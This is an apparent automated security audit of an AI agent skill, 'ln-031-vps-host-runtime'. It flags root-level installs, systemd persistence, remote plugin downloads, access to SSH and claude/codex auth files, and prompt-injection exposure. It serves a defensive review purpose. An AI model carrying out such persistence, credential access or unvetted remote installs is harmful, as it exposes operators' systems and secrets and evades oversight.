ln-031-vps-host-runtime
Warn
Audited by Gen Agent Trust Hub on May 5, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: Performs high-privilege system operations including apt package installation, GitHub/GitLab CLI setup, and modification of system-wide directories such as
/usr/local/binand/var/lib/using root permissions. - [COMMAND_EXECUTION]: Installs and configures system-wide persistence mechanisms via systemd services and timers (
agent-update.service,agent-update.timer) to maintain access and perform automated updates. - [EXTERNAL_DOWNLOADS]: Clones a "skills marketplace" and installs selected plugins from remote sources, introducing a dependency on external code that is executed with the agent's permissions.
- [DATA_EXFILTRATION]: Accesses and verifies sensitive file paths including SSH ownership,
claudeandcodexlogin/auth files, and project-specific trust blocks, creating a capability surface for potential exposure of credentials. - [PROMPT_INJECTION]: The skill possesses an indirect injection surface by ingesting external data from "contracts" and "marketplace plugins" which could contain instructions that override agent behavior or safety protocols.
Audit Metadata